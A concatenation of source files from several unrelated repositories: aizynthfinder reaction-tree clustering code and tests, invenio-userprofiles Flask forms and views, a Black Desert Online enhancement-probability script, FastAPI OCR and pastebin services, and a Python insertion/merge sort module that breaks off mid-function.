:param filename: the name of the tarball
:type filename: str
:param in_stock_colors: the colors around molecules, defaults to {True: "green", False: "orange"}
:type in_stock_colors: dict, optional
"""
molecules = [node for node in self.graph if isinstance(node, Molecule)]
reactions = [node for node in self.graph if not isinstance(node, Molecule)]
frame_colors = [
in_stock_colors[self.graph.nodes[node].get("in_stock", False)]
for node in molecules
]
make_visjs_page(filename, molecules, reactions, self.graph.edges, frame_colors)
def _add_reaction_trees_to_node(self, base_node, rt_node_spec):
reaction_groups = defaultdict(list)
# Group the reactions from the nodes at this level based on the reaction smiles
for node, graph in rt_node_spec:
for reaction in graph[node]:
reaction_groups[reaction.reaction_smiles()].append((graph, reaction))
for group in reaction_groups.values():
# Use the first RT in each group as the base
first_graph, first_reaction = group[0]
reaction_node = first_reaction.copy()
self.graph.add_edge(base_node, reaction_node)
for child in first_graph[first_reaction]:
mol_node = child.make_unique()
self.graph.add_node(
mol_node, in_stock=first_graph.nodes[child].get("in_stock", False)
)
self.graph.add_edge(reaction_node, mol_node)
self._add_reaction_trees_to_node(
mol_node, self._find_other_children(child, group)
)
@staticmethod
def _find_other_children(child, group):
children_spec = []
for other_graph, other_reaction in group:
found = False
for other_child in other_graph[other_reaction]:
if other_child.inchi_key == child.inchi_key:
children_spec.append((other_child, other_graph))
found = True
break
if not found:
raise ValueError("Could not find other child")
return children_spec
```
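A hedged usage sketch for `CombinedReactionTrees`; `finder.routes.reaction_trees` is assumed to hold `ReactionTree` objects, following the aizynthfinder API used above:

```python
# Sketch only: combine the trees of several found routes and export them.
combined = CombinedReactionTrees(finder.routes.reaction_trees)
tree_dict = combined.to_dict()                 # pre-defined dict format
combined.to_visjs_page("combined_routes.tar")  # HTML + images in a tarball
```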
#### File: utils/route_clustering/distances.py
```python
import random
import itertools
import math
from enum import Enum
from operator import itemgetter
import numpy as np
from apted import Config as BaseAptedConfig
from apted import APTED as Apted
from scipy.spatial.distance import jaccard as jaccard_dist
from aizynthfinder.chem import Molecule
from aizynthfinder.utils.logging import logger
class TreeContent(str, Enum):
""" Possibilities for distance calculations on reaction trees
"""
MOLECULES = "molecules"
REACTIONS = "reactions"
BOTH = "both"
class AptedConfig(BaseAptedConfig):
"""
This is a helper class for the tree edit distance
calculation. It defines how the substitution
cost is calculated and how to obtain children nodes.
:param randomize: if True, the children will be shuffled
:type randomize: bool, optional
:param sort_children: if True, the children will be sorted
:type sort_children: bool, optional
"""
def __init__(self, randomize=False, sort_children=False):
super().__init__()
self._randomize = randomize
self._sort_children = sort_children
def rename(self, node1, node2):
if node1["type"] != node2["type"]:
return 1
fp1 = node1["fingerprint"]
fp2 = node2["fingerprint"]
return jaccard_dist(fp1, fp2)
def children(self, node):
if self._sort_children:
return sorted(node["children"], key=itemgetter("sort_key"))
if not self._randomize:
return node["children"]
children = list(node["children"])
random.shuffle(children)
return children
class ReactionTreeWrapper:
"""
    Wrapper for a reaction tree that can calculate distances between
trees.
:param reaction_tree: the reaction tree to wrap
:type reaction_tree: ReactionTree
:param content: the content of the route to consider in the distance calculation
:type content: TreeContent, optional
    :param exhaustive_limit: if the number of possible ordered trees is below this limit, create them all
:type exhaustive_limit: int, optional
"""
_index_permutations = {
n: list(itertools.permutations(range(n), n)) for n in range(1, 8)
}
def __init__(
self, reaction_tree, content=TreeContent.MOLECULES, exhaustive_limit=20
):
self._logger = logger()
# Will convert string input automatically
self._content = TreeContent(content)
self._graph = reaction_tree.graph
self._root = self._make_root(reaction_tree)
self._trees = []
self._tree_count, self._node_index_list = self._inspect_tree()
self._enumeration = self._tree_count <= exhaustive_limit
if not self._root:
return
if self._enumeration:
self._create_all_trees()
else:
self._trees.append(self._create_tree_recursively(self._root))
@property
def info(self):
""" Return a dictionary with internal information about the wrapper
"""
return {
"content": self._content,
"tree count": self._tree_count,
"enumeration": self._enumeration,
"root": self._root,
}
@property
def first_tree(self):
""" Return the first created ordered tree
"""
return self._trees[0]
@property
def trees(self):
""" Return a list of all created ordered trees
"""
return self._trees
def distance_iter(self, other, exhaustive_limit=20):
"""
Iterate over all distances computed between this and another tree
        There are three possible enumerations of the distances, depending
        on the number of possible ordered trees for the two routes being compared
        * If the product of the number of possible ordered trees for both routes is
        below `exhaustive_limit`, compute the distance between all pairs of trees
        * If both self and other have been fully enumerated (i.e. all ordered trees have been created),
        compute the distances between all trees of the route with the most ordered trees and
        the first tree of the other route
        * Compute `exhaustive_limit` number of distances by shuffling the child order for
        each of the routes.
        The rules are applied top-to-bottom.
:param other: another tree to calculate distance to
:type other: ReactionTreeWrapper
:param exhaustive_limit: used to determine what type of enumeration to do
:type exhaustive_limit: int, optional
:yield: the next computed distance between self and other
:rtype: float
"""
if len(self.trees) * len(other.trees) < exhaustive_limit:
yield from self._distance_iter_exhaustive(other)
elif self._enumeration or other.info["enumeration"]:
yield from self._distance_iter_semi_exhaustive(other)
else:
yield from self._distance_iter_random(other, exhaustive_limit)
def distance_to(self, other, exhaustive_limit=20):
"""
Calculate the minimum distance from this route to another route
Enumerate the distances using `distance_iter`.
:param other: another tree to calculate distance to
:type other: ReactionTreeWrapper
:param exhaustive_limit: used to determine what type of enumeration to do
:type exhaustive_limit: int, optional
        :return: the minimum distance
:rtype: float
"""
min_dist = 1e6
min_iter = -1
for iteration, distance in enumerate(
self.distance_iter(other, exhaustive_limit)
):
if distance < min_dist:
min_iter = iteration
min_dist = distance
self._logger.debug(f"Found minimum after {min_iter} iterations")
return min_dist
def distance_to_with_sorting(self, other):
"""
        Compute the distance to another tree, by simply sorting the children
of both trees. This is not guaranteed to return the minimum distance.
:param other: another tree to calculate distance to
:type other: ReactionTreeWrapper
:return: the distance
:rtype: float
"""
config = AptedConfig(sort_children=True)
return Apted(self.first_tree, other.first_tree, config).compute_edit_distance()
def _compute_fingerprint(self, node):
if isinstance(node, Molecule):
return node.fingerprint(radius=2).astype(int)
# Difference fingerprint for reactions
product = next(self._graph.predecessors(node))
fp = product.fingerprint(radius=2).copy()
for reactant in self._graph.successors(node):
fp -= reactant.fingerprint(radius=2)
return fp.astype(int)
def _create_all_trees(self):
self._trees = []
# Iterate over all possible combinations of child order
for order_list in itertools.product(*self._node_index_list):
order_dict = {idict["node"]: idict["child_order"] for idict in order_list}
self._trees.append(self._create_tree_recursively(self._root, order_dict))
def _create_tree_recursively(self, node, order_dict=None):
fp = self._compute_fingerprint(node)
dict_tree = {
"type": node.__class__.__name__,
"smiles": node.smiles,
"fingerprint": fp,
"sort_key": "".join(f"{digit}" for digit in fp),
"children": [],
}
for child in self._iter_children(node, order_dict):
child_tree = self._create_tree_recursively(child, order_dict)
dict_tree["children"].append(child_tree)
return dict_tree
def _distance_iter_exhaustive(self, other):
self._logger.debug(
f"APTED: Exhaustive search. {len(self.trees)} {len(other.trees)}"
)
config = AptedConfig(randomize=False)
for tree1, tree2 in itertools.product(self.trees, other.trees):
yield Apted(tree1, tree2, config).compute_edit_distance()
def _distance_iter_random(self, other, ntimes):
self._logger.debug(
f"APTED: Heuristic search. {len(self.trees)} {len(other.trees)}"
)
config = AptedConfig(randomize=False)
yield Apted(self.first_tree, other.first_tree, config).compute_edit_distance()
config = AptedConfig(randomize=True)
for _ in range(ntimes):
yield Apted(
self.first_tree, other.first_tree, config
).compute_edit_distance()
def _distance_iter_semi_exhaustive(self, other):
self._logger.debug(
f"APTED: Semi-exhaustive search. {len(self.trees)} {len(other.trees)}"
)
if len(self.trees) < len(other.trees):
first_wrapper = self
second_wrapper = other
else:
first_wrapper = other
second_wrapper = self
config = AptedConfig(randomize=False)
for tree1 in first_wrapper.trees:
yield Apted(
tree1, second_wrapper.first_tree, config
).compute_edit_distance()
def _inspect_tree(self):
"""
Find the number of children for each node in the tree, which
will be used to compute the number of possible combinations of child orders
Also accumulate the possible child orders for the nodes.
"""
permutations = []
node_index_list = []
for node in self._graph.nodes:
# fmt: off
if (
isinstance(node, Molecule) and self._content is TreeContent.REACTIONS
) or (
not isinstance(node, Molecule) and self._content is TreeContent.MOLECULES
):
continue
# fmt: on
nchildren = len(list(self._iter_children(node)))
permutations.append(math.factorial(nchildren))
if nchildren > 0:
node_index_list.append(
[
{"node": node, "child_order": idx}
for idx in self._index_permutations[nchildren]
]
)
if not permutations:
return 0, []
return np.prod(permutations), node_index_list
def _iter_children(self, node, order_dict=None):
def _generator(node, lookup_node):
if order_dict is None:
for child in self._graph.successors(node):
yield child
else:
children = list(self._graph.successors(node))
if children:
for child_idx in order_dict.get(lookup_node, []):
yield children[child_idx]
if self._content is TreeContent.BOTH:
yield from _generator(node, node)
else:
for succ in self._graph.successors(node):
yield from _generator(succ, node)
def _make_root(self, reaction_tree):
if self._content is TreeContent.REACTIONS:
try:
return next(self._graph.successors(reaction_tree.root))
except StopIteration:
return None
else:
return reaction_tree.root
```
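A minimal sketch of computing route distances with the wrapper above, assuming two existing `ReactionTree` objects `rt1` and `rt2`:

```python
w1 = ReactionTreeWrapper(rt1, content=TreeContent.BOTH)
w2 = ReactionTreeWrapper(rt2, content=TreeContent.BOTH)
print(w1.distance_to(w2))               # minimum over enumerated child orders
print(w1.distance_to_with_sorting(w2))  # cheaper, not guaranteed minimal
```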
#### File: aizynthfinder/tests/test_clustering.py
```python
import numpy as np
from aizynthfinder.utils.route_clustering.clustering import ClusteringHelper
distance_matrix = np.array(
[
[0.0, 1.0, 20.0, 15.0],
[1.0, 0.0, 17.0, 12.0],
[20.0, 17.0, 0.0, 5.0],
[15.0, 12.0, 5.0, 0.0],
]
)
def test_create_clustering_helper():
helper = ClusteringHelper(distance_matrix)
assert helper.labels is None
def test_make_two_clusters():
helper = ClusteringHelper(distance_matrix)
labels = helper.fixed_clustering(2)
assert labels[0] == labels[1]
assert labels[0] != labels[2]
assert labels[2] == labels[3]
def test_optimize_clusters():
helper = ClusteringHelper(distance_matrix)
labels = helper.optimize()
assert max(labels) == 1
assert labels[0] == labels[1]
assert labels[0] != labels[2]
assert labels[2] == labels[3]
assert len(helper.optimization_scores) == 2
def test_clustering_helper():
labels1 = ClusteringHelper.cluster(distance_matrix, 2)
labels2 = ClusteringHelper.cluster(distance_matrix, 1)
assert list(labels1) == list(labels2)
def test_linkage_matrix():
helper = ClusteringHelper(distance_matrix)
matrix = helper.linkage_matrix()
assert len(matrix) == 3
``` |
{
"source": "0x2b3bfa0/invenio-userprofiles",
"score": 3
} |
#### File: invenio-userprofiles/invenio_userprofiles/forms.py
```python
from __future__ import absolute_import, print_function
from flask_babelex import lazy_gettext as _
from flask_login import current_user
from flask_security.forms import email_required, email_validator, \
unique_user_email
from flask_wtf import FlaskForm
from sqlalchemy.orm.exc import NoResultFound
from wtforms import FormField, StringField, SubmitField
from wtforms.validators import DataRequired, EqualTo, StopValidation, \
ValidationError
from .api import current_userprofile
from .models import UserProfile
from .validators import USERNAME_RULES, validate_username
def strip_filter(text):
"""Filter for trimming whitespace.
:param text: The text to strip.
:returns: The stripped text.
"""
return text.strip() if text else text
def current_user_email(form, field):
"""Field validator to stop validation if email wasn't changed."""
if current_user.email == field.data:
raise StopValidation()
class ProfileForm(FlaskForm):
"""Form for editing user profile."""
username = StringField(
# NOTE: Form field label
_('Username'),
# NOTE: Form field help text
description=_('Required. %(username_rules)s',
username_rules=USERNAME_RULES),
validators=[DataRequired(message=_('Username not provided.'))],
filters=[strip_filter], )
full_name = StringField(
# NOTE: Form label
_('Full name'),
filters=[strip_filter], )
def validate_username(form, field):
"""Wrap username validator for WTForms."""
try:
validate_username(field.data)
except ValueError as e:
raise ValidationError(e)
try:
# Check if username is already taken (if the username is *not*
# found a NoResultFound exception is raised).
user_profile = UserProfile.get_by_username(field.data)
# NOTE: Form validation error.
msg = _('Username already exists.')
            if current_userprofile.is_anonymous:
                # We are handling a new sign up (i.e. anonymous user) AND
                # the username already exists. Fail.
                raise ValidationError(msg)
            else:
                # We are handling a user editing their profile AND
                # the username already exists.
is_same_user = \
current_user.id == user_profile.user_id
if not is_same_user:
# Username already taken by another user.
raise ValidationError(msg)
except NoResultFound:
return
class EmailProfileForm(ProfileForm):
"""Form to allow editing of email address."""
email = StringField(
# NOTE: Form field label
_('Email address'),
filters=[lambda x: x.lower() if x is not None else x, ],
validators=[
email_required,
current_user_email,
email_validator,
unique_user_email,
],
)
email_repeat = StringField(
# NOTE: Form field label
_('Re-enter email address'),
# NOTE: Form field help text
description=_('Please re-enter your email address.'),
filters=[lambda x: x.lower() if x else x, ],
validators=[
email_required,
# NOTE: Form validation error.
EqualTo('email', message=_('Email addresses do not match.'))
]
)
class VerificationForm(FlaskForm):
"""Form to render a button to request email confirmation."""
# NOTE: Form button label
send_verification_email = SubmitField(_('Resend verification email'))
def register_form_factory(Form):
"""Factory for creating an extended user registration form."""
class CsrfDisabledProfileForm(ProfileForm):
"""Subclass of ProfileForm to disable CSRF token in the inner form.
        This class will always be an inner form field of the parent class
`Form`. The parent will add/remove the CSRF token in the form.
"""
def __init__(self, *args, **kwargs):
"""Initialize the object by hardcoding CSRF token to false."""
kwargs = _update_with_csrf_disabled(kwargs)
super(CsrfDisabledProfileForm, self).__init__(*args, **kwargs)
class RegisterForm(Form):
"""RegisterForm extended with UserProfile details."""
profile = FormField(CsrfDisabledProfileForm, separator='.')
return RegisterForm
def confirm_register_form_factory(Form):
"""Factory for creating a confirm register form."""
class CsrfDisabledProfileForm(ProfileForm):
"""Subclass of ProfileForm to disable CSRF token in the inner form.
        This class will always be an inner form field of the parent class
`Form`. The parent will add/remove the CSRF token in the form.
"""
def __init__(self, *args, **kwargs):
"""Initialize the object by hardcoding CSRF token to false."""
kwargs = _update_with_csrf_disabled(kwargs)
super(CsrfDisabledProfileForm, self).__init__(*args, **kwargs)
class ConfirmRegisterForm(Form):
"""RegisterForm extended with UserProfile details."""
profile = FormField(CsrfDisabledProfileForm, separator='.')
return ConfirmRegisterForm
def _update_with_csrf_disabled(d=None):
"""Update the input dict with CSRF disabled depending on WTF-Form version.
From Flask-WTF 0.14.0, `csrf_enabled` param has been deprecated in favor of
`meta={csrf: True/False}`.
"""
if d is None:
d = {}
import flask_wtf
from pkg_resources import parse_version
supports_meta = parse_version(flask_wtf.__version__) >= parse_version(
"0.14.0")
if supports_meta:
d.setdefault('meta', {})
d['meta'].update({'csrf': False})
else:
d['csrf_enabled'] = False
return d
```
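A hedged sketch of how these factories are typically wired into Flask-Security; the `Security(...)` line is illustrative only, and `app` and `user_datastore` are assumed to exist elsewhere in the application factory:

```python
from flask_security.forms import RegisterForm

ExtendedRegisterForm = register_form_factory(RegisterForm)
# Security(app, user_datastore, register_form=ExtendedRegisterForm)
```

`confirm_register_form_factory` is used the same way when email confirmation is enabled, as `init_common()` in views.py shows.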
#### File: invenio-userprofiles/invenio_userprofiles/views.py
```python
from __future__ import absolute_import, print_function
from flask import Blueprint, current_app, flash, render_template, request
from flask_babelex import lazy_gettext as _
from flask_breadcrumbs import register_breadcrumb
from flask_login import current_user, login_required
from flask_menu import register_menu
from flask_security.confirmable import send_confirmation_instructions
from invenio_db import db
from invenio_theme.proxies import current_theme_icons
from speaklater import make_lazy_string
from .api import current_userprofile
from .forms import EmailProfileForm, ProfileForm, VerificationForm, \
confirm_register_form_factory, register_form_factory
from .models import UserProfile
blueprint = Blueprint(
'invenio_userprofiles',
__name__,
template_folder='templates',
)
blueprint_api_init = Blueprint(
'invenio_userprofiles_api_init',
__name__,
template_folder='templates',
)
blueprint_ui_init = Blueprint(
'invenio_userprofiles_ui_init',
__name__,
)
def init_common(app):
"""Post initialization."""
if app.config['USERPROFILES_EXTEND_SECURITY_FORMS']:
security_ext = app.extensions['security']
security_ext.confirm_register_form = confirm_register_form_factory(
security_ext.confirm_register_form)
security_ext.register_form = register_form_factory(
security_ext.register_form)
@blueprint_ui_init.record_once
def init_ui(state):
"""Post initialization for UI application."""
app = state.app
init_common(app)
# Register blueprint for templates
app.register_blueprint(
blueprint, url_prefix=app.config['USERPROFILES_PROFILE_URL'])
@blueprint_api_init.record_once
def init_api(state):
"""Post initialization for API application."""
init_common(state.app)
@blueprint.app_template_filter()
def userprofile(value):
"""Retrieve user profile for a given user id."""
return UserProfile.get_by_userid(int(value))
@blueprint.route('/', methods=['GET', 'POST'])
@login_required
@register_menu(
blueprint, 'settings.profile',
# NOTE: Menu item text (icon replaced by a user icon).
_('%(icon)s Profile', icon=make_lazy_string(
lambda: f'<i class="{current_theme_icons.user}"></i>')),
order=0
)
@register_breadcrumb(
blueprint, 'breadcrumbs.settings.profile', _('Profile')
)
def profile():
"""View for editing a profile."""
# Create forms
verification_form = VerificationForm(formdata=None, prefix="verification")
profile_form = profile_form_factory()
# Process forms
form = request.form.get('submit', None)
if form == 'profile':
handle_profile_form(profile_form)
elif form == 'verification':
handle_verification_form(verification_form)
return render_template(
current_app.config['USERPROFILES_PROFILE_TEMPLATE'],
profile_form=profile_form,
verification_form=verification_form,)
def profile_form_factory():
"""Create a profile form."""
if current_app.config['USERPROFILES_EMAIL_ENABLED']:
return EmailProfileForm(
formdata=None,
username=current_userprofile.username,
full_name=current_userprofile.full_name,
email=current_user.email,
email_repeat=current_user.email,
prefix='profile', )
else:
return ProfileForm(
formdata=None,
obj=current_userprofile,
prefix='profile', )
def handle_verification_form(form):
"""Handle email sending verification form."""
form.process(formdata=request.form)
if form.validate_on_submit():
send_confirmation_instructions(current_user)
# NOTE: Flash message.
flash(_("Verification email sent."), category="success")
def handle_profile_form(form):
"""Handle profile update form."""
form.process(formdata=request.form)
if form.validate_on_submit():
email_changed = False
with db.session.begin_nested():
# Update profile.
current_userprofile.username = form.username.data
current_userprofile.full_name = form.full_name.data
db.session.add(current_userprofile)
# Update email
if current_app.config['USERPROFILES_EMAIL_ENABLED'] and \
form.email.data != current_user.email:
current_user.email = form.email.data
current_user.confirmed_at = None
db.session.add(current_user)
email_changed = True
db.session.commit()
if email_changed:
send_confirmation_instructions(current_user)
# NOTE: Flash message after successful update of profile.
flash(_('Profile was updated. We have sent a verification '
'email to %(email)s. Please check it.',
email=current_user.email),
category='success')
else:
# NOTE: Flash message after successful update of profile.
flash(_('Profile was updated.'), category='success')
``` |
{
"source": "0x307845/Bdo-Stats",
"score": 3
} |
#### File: 0x307845/Bdo-Stats/stats_opti.py
```python
def factorielle(n):
if n == 0:
return 1
else:
return n * factorielle(n-1)
def combin(n, k):
if k > n//2:
k = n-k
x = 1
y = 1
i = n-k+1
while i <= n:
x = (x*i)//y
y += 1
i += 1
return x
def binom(k, n, p):
    return combin(n, k) * pow(p, k) * pow(1 - p, n - k)
def cost(market_price, tries, cron):
    total = (tries * cron + 1) * 2
    if total > market_price:
        return [False, total]
    return [True, total]
def taux_var(p, t):
    i = 1
    while True:
        a = 1 - binom(0, i, p)
        if a >= t:
            break
        i = i + 1
    return i, a
def stats(p, t, m, c):
    taux = taux_var(p, t)
    cout = cost(m, taux[0], c)
    a = taux[0]
    # d is the first try count at which the attempt stops being profitable;
    # it stays None when the attempt is already unprofitable.
    d = None
    if cout[0]:
        d = a
        while True:
            cout_b = cost(m, d, c)
            d = d + 1
            if not cout_b[0]:
                break
    return [t, a, cout[0], cout[1], p, m, d, c]
a = stats(0.1875, 0.70, 2000, 147)
print("\nProbability: ", a[4] * 100, '%')
print("Market price:", a[5])
print("Crons per attempt: ", a[7])
print("========================================")
print('Number of tries to reach ', a[0] * 100, '%: ', a[1])
print('Total cost: ', a[3])
print('Profitable: ', a[2])
if a[6] is not None:
    print('Max tries:', a[6])
print('Max probability:', (1 - binom(0, 8, 0.1875)) * 100)
print('\n\nPrices are in millions!')
``` |
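The script leans on the identity P(at least one success in n tries) = 1 − binom(0, n, p), which is exactly what `taux_var` searches over. A quick sanity check using the functions above:

```python
# Sanity check of the at-least-one-success identity used by taux_var():
# P(at least 1 success in n tries) = 1 - binom(0, n, p)
p = 0.1875
for n in (1, 5, 8):
    print(n, 1 - binom(0, n, p))
# taux_var(p, 0.70) returns the smallest n where this value reaches 0.70
```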
{
"source": "0x30c4/FastOCR",
"score": 2
} |
#### File: FastOCR/app/main.py
```python
from uvicorn import run
from fastapi import FastAPI, UploadFile, File, status, HTTPException, Response
from fastapi.middleware.cors import CORSMiddleware
from fastapi_sqlalchemy import DBSessionMiddleware, db
from aiofiles import open as aio_open
from pytesseract import image_to_string
from os.path import join
from uuid import uuid4
from models import Image as ModelImage
# Importing the ENV vars from config
from config import (
DATABASE_URL,
UPLOAD_DIR,
ALLOWED_FILE_EXT,
PORT,
WORKERS,
HOST,
RELOAD,
LOG_LEVEL,
LOG_INI
)
app = FastAPI(
openapi_url="/api/openapi.json",
docs_url="/api/docs"
)
origins = [
"http://192.168.69.55",
"http://192.168.69.3",
"https://ocr.0x30c4.dev",
]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.add_middleware(DBSessionMiddleware, db_url=DATABASE_URL)
@app.post("/api/image", status_code=status.HTTP_201_CREATED)
async def process(file: UploadFile = File(...)):
"""
Processes the image and returns the extracted text.
    - **file**: The file that will be processed.
"""
ret_obj = {}
if not file.content_type.lower().endswith(ALLOWED_FILE_EXT):
raise HTTPException(status_code=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE,
detail="File Type Not Supported! Supported File"
f"type [{', '.join(ALLOWED_FILE_EXT)}]")
else:
# Get the image extension.
file_ext = file.content_type.split("/")[1]
# Create ModelImage obj to get the UUID.
image_db = ModelImage(
text="", file_ext=file_ext,
original_file_name=file.filename, uuid=uuid4().hex
)
# Creating file name for the image.
        # image_db.uuid is already a hex string (uuid4().hex)
        file_name = image_db.uuid + "." + file_ext
file_path = join(UPLOAD_DIR, file_name)
# Write image to the disk
async with aio_open(file_path, "wb") as out_file:
while content := await file.read(1024):
await out_file.write(content)
# Extracting text from the image.
image_db.text = image_to_string(file_path)
# Putting the text data on the db.
db.session.add(image_db)
db.session.commit()
if not image_db.text.strip():
image_db.text = 'No Text Was Found!'
ret_obj["text"] = image_db.text
ret_obj["url"] = "uploads/" + file_name
return ret_obj
@app.get("/api/get_images/{uuid}")
async def get_images(response: Response, uuid: str):
"""
    Find an image by UUID and, if found, return the image's
    text and other data.
- **uuid** : The UUID of the image that you want to get
data of.
"""
# Making a query for the data.
image: ModelImage = db.session.query(ModelImage).\
filter(ModelImage.uuid == uuid).first()
# If nothing was found then rise a 404 not found exception.
if not image:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail="Image Not Fount!"
)
    # Don't expose the internal database id in the response
del image.id
return image
if __name__ == "__main__":
run(
"main:app", host=HOST, port=PORT,
log_level=LOG_LEVEL, workers=WORKERS,
reload=RELOAD, log_config=LOG_INI
)
``` |
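A hypothetical client sketch for the endpoint above using `requests`; the host and port are assumptions (they come from the HOST/PORT config values, which are not shown here):

```python
import requests

with open("sample.png", "rb") as fh:
    resp = requests.post(
        "http://localhost:8000/api/image",  # assumed host/port
        files={"file": ("sample.png", fh, "image/png")},
    )
print(resp.json())  # expected shape: {"text": ..., "url": "uploads/<uuid>.png"}
```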
{
"source": "0x30c4/FastPasteBin",
"score": 2
} |
#### File: app/back-end/main.py
```python
from uvicorn import run, logging
from fastapi_sqlalchemy import DBSessionMiddleware, db
from aiofiles import open as aio_open
from os import environ
from os.path import join
from uuid import uuid4
from typing import Union
from fastapi import (
FastAPI,
UploadFile,
File,
status,
HTTPException,
Request,
)
from starlette.responses import RedirectResponse
from db.models import Bindata as ModelBinData
from configs.config import (
title,
db_url,
BIN_UPLOAD,
APP_URL,
APP_URL_INDEX,
APP_URL_UBIN,
LOG_INI,
version,
terms_of_service,
contact,
license_info,
description,
help_text
)
app = FastAPI(
title=title,
description=description,
version=version,
terms_of_service=terms_of_service,
contact=contact,
license_info=license_info,
openapi_url="/api/openapi.json",
docs_url="/api/docs"
)
app.add_middleware(DBSessionMiddleware, db_url=db_url)
async def write_to_file(file, uuid):
# Write the paste to the disk
try:
# creating the file name with full path
file_path = join(BIN_UPLOAD, uuid)
async with aio_open(file_path, "wb") as out_file:
while content := await file.read(1024):
await out_file.write(content)
except Exception as e:
logging.logging.error(e)
raise HTTPException(status_code=status
.HTTP_500_INTERNAL_SERVER_ERROR,
detail="Couldn't Save The File!")
return True
@app.get("/", status_code=status.HTTP_301_MOVED_PERMANENTLY)
async def index(request: Request) -> RedirectResponse:
"""
    This page just redirects browser clients to the web front end.
"""
# If the client is requesting from a terminal then return
# the help menu
if "curl" in request.headers.get("user-agent"):
return help_text
return RedirectResponse(url=join(APP_URL, APP_URL_INDEX))
@app.post("/", status_code=status.HTTP_201_CREATED)
async def paste_bin(
request: Request,
file: UploadFile = File(None),
meta_data: str = "",
is_tmp: bool = False,
rf: str = "url",
) -> Union[dict, str]:
"""
    This is the main paste bin endpoint that handles new pastes.
"""
# if file is None raise error 415
if file is None:
logging.logging.error("No Data Was Pasted!")
raise HTTPException(status_code=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE,
detail="No data was Pasted!")
    # if no content length was provided with the request,
    # raise a 411 Length Required error
if "content-length" not in request.headers:
logging.logging.error("No Content-Length Header!")
raise HTTPException(status_code=status.HTTP_411_LENGTH_REQUIRED,
detail="No Content-Length Header!")
    # create a unique 32-char version-4 UUID hex string
gen_uuid = uuid4().hex
    # if the write operation is successful, store the paste's
    # related data in the db.
if await write_to_file(file, gen_uuid):
image_db = ModelBinData(
uuid=gen_uuid, meta_data=meta_data,
is_tmp=is_tmp
)
db.session.add(image_db)
db.session.commit()
    # normalise the requested response format (the original discarded
    # the result of rf.lower())
    rf = rf.lower()
ret_obj = None
# building the paste url with the gen_uuid
resp_url = join(APP_URL, APP_URL_UBIN, gen_uuid)
# if the user want's json response then return
# json else by default return just the paste url.
if rf == "json":
ret_obj = {
"uuid": gen_uuid,
"meta_data": meta_data,
"is_tmp": is_tmp,
"url": resp_url
}
elif rf == "url":
ret_obj = resp_url
return ret_obj
    # if writing the paste to disk fails, return an empty response.
return {}
if __name__ == "__main__":
port = int(environ.get("PORT", default=5000))
workers = int(environ.get("WORKERS", default=1))
host = environ.get("HOST", default="0.0.0.0")
log_level = environ.get("LOG_LEVEL", default="info")
reload = int(environ.get("RELOAD", default="1"))
run(
"main:app", host=host, port=port,
log_level=log_level, workers=workers,
reload=reload, log_config=LOG_INI
)
``` |
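A hypothetical client sketch mirroring the `__main__` defaults above (0.0.0.0:5000); `rf=json` selects the JSON response shape:

```python
import requests

with open("notes.txt", "rb") as fh:
    resp = requests.post(
        "http://localhost:5000/",  # assumed from the HOST/PORT defaults
        params={"rf": "json", "is_tmp": "false"},
        files={"file": fh},
    )
print(resp.json())  # {"uuid": ..., "meta_data": ..., "is_tmp": ..., "url": ...}
```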
{
"source": "0x326/academic-code-portfolio",
"score": 4
} |
#### File: Coding Assignments/src/sorting.py
```python
import argparse
import random
from collections import deque
from typing import Iterable, Sequence, Deque, List, Union, Callable, TypeVar
T = TypeVar('T')
def insertion_sorted(array: Union[Sequence[T], List[T]], in_place=True,
key: Callable[[T], int] = lambda item: item) -> Iterable[T]:
"""
Performs an insertion sort on a list. Can either be in-place or out-of-place
:param array: The array to sort
:param in_place: Whether to perform the sort in place
:param key: A function to extract the value each element is to be sorted by
:return: The sorted array
"""
if len(array) <= 1:
return array
if in_place:
# Use non-Pythonic for loop for low-level insertion sort
# First item is already sorted
for index in range(1, len(array)):
item = array[index]
item_key = key(item)
for sorted_index in range(0, index):
sorted_item_key = key(array[sorted_index])
if item_key < sorted_item_key:
array.pop(index)
array.insert(sorted_index, item)
break
return array
else:
        sorted_list: Deque[T] = deque(maxlen=len(array))
        for item in array:
            item_key = key(item)
            for sorted_index, sorted_item_key in enumerate(map(key, sorted_list)):
                if item_key < sorted_item_key:
                    sorted_list.insert(sorted_index, item)
                    break
            else:
                # No smaller element found: item belongs at the end.
                # Without this append, items >= the current maximum were
                # silently dropped.
                sorted_list.append(item)
        return sorted_list
def merge_sorted(iter1: Iterable[T], iter2: Iterable[T], key: Callable[[T], int] = lambda item: item) -> Iterable[T]:
"""
Merges two sorted iterables while maintaining sorted order
:param iter1: A sorted iterable
    :param iter2: Another sorted iterable
:param key: A function to extract the value each element is to be sorted by
:return: A single sorted iterable
"""
iter1 = iter(iter1)
iter2 = iter(iter2)
item1 = None
item2 = None
try:
item1 = next(iter1)
item1_key = key(item1)
item2 = next(iter2)
item2_key = key(item2)
while True:
if item1_key < item2_key:
yield item1
item1 = None
item1 = next(iter1)
item1_key = key(item1)
else:
yield item2
item2 = None
item2 = next(iter2)
item2_key = key(item2)
except StopIteration:
# Don't forget an item from a non-empty iterable
if item1 is not None:
yield item1
elif item2 is not None:
yield item2
# We can now just empty them out
yield from iter1
yield from iter2
return
def combo_sorted(array: List[T], block_size: int = 32, key: Callable[[T], int] = lambda item: item) -> Iterable[T]:
"""
A combination of insertion sort and merge sort. When length is below ``block_size``, uses insertion sort.
Otherwise, merge sort.
:param array: The list to sort
:param block_size: The maximum threshold for insertion sort
:param key: A function to extract the value each element is to be sorted by
:return: A sorted iterable
"""
if len(array) <= 1:
yield from array
return
if len(array) < block_size:
yield from insertion_sorted(array, key=key)
else:
# Divide and conquer
sorted_left = combo_sorted(array[:len(array) // 2], block_size=block_size, key=key)
sorted_right = combo_sorted(array[len(array) // 2:], block_size=block_size, key=key)
yield from merge_sorted(sorted_left, sorted_right, key=key)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Sort a random array')
parser.add_argument('array_length', metavar='N', type=int, nargs='?', default=320,
help='Length of the array to generate')
    parser.add_argument('--block-size', metavar='R', type=int, default=32,
                        help='Maximum subarray length handled by insertion sort')
parser.add_argument('--min-value', metavar='R', type=int, default=0,
help='Minimum value for random array (inclusive)')
parser.add_argument('--max-value', metavar='R', type=int, default=5000,
help='Maximum value for random array (inclusive)')
args = parser.parse_args()
for _ in range(20):
# Generate array
